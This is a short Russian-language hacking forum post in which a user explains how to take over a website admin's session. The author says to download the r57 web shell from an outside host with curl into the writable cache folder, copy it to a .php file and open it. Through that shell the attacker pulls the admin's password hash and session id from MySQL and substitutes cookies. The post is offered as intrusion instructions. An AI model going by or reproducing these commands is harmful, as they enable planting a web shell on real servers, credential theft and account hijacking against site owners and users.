21.06.2006, 15:48
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....
Самый простой способ лить в папку cаche, она на запись всегда разрешена. И curl почти везде есть.
Значит пробираешь pwd(узнаешь папку в которой ты находишся). И пишешь curl -o путь/cache/file.txt http://rst.void.ru/download/r57shell.txt .... А потом cp путь/cache/file.txt путь/cache/file.php , и идешь путь/cache/file.php
Все расписал подробнее нельзя.
Последний раз редактировалось DimaHbl4; 21.06.2006 в 15:55..
|
|
|